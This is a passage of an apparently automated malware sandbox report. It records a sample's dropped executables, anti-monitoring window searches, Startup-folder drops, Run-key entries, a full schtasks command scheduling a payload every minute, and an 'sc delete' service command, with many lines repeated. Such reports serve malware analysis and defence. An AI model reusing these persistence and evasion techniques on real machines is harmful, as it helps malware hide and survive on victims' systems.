                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libffi-8.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeFile created: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeJump to dropped file
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\Temp\aodefromlpug.sysJump to dropped file

                          Boot Survival

                          barindex
                          Drops PE files to the startup folder
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exeJump to dropped file
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWindow searched: window name: Regmonclass
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NzL6O1Q
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NzL6O1Q
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "RNRFMTFS"

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
